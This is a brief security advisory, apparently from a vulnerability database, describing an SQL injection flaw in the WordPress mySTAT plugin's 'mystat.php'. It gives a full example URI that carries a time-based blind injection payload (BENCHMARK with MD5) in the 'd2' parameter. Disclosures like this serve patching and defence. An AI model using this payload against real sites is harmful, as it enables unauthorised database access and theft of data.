WordPress mySTAT Plugin 'mystat.php' SQL Injection Vulnerability

WordPress mySTAT Plugin 'mystat.php' SQL Injection Vulnerability

The following example URI is available:

http://www.examplecom/wp-content/plugins/mystat/mystat.php?act=stat_img&d1=1&d2=-1') AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20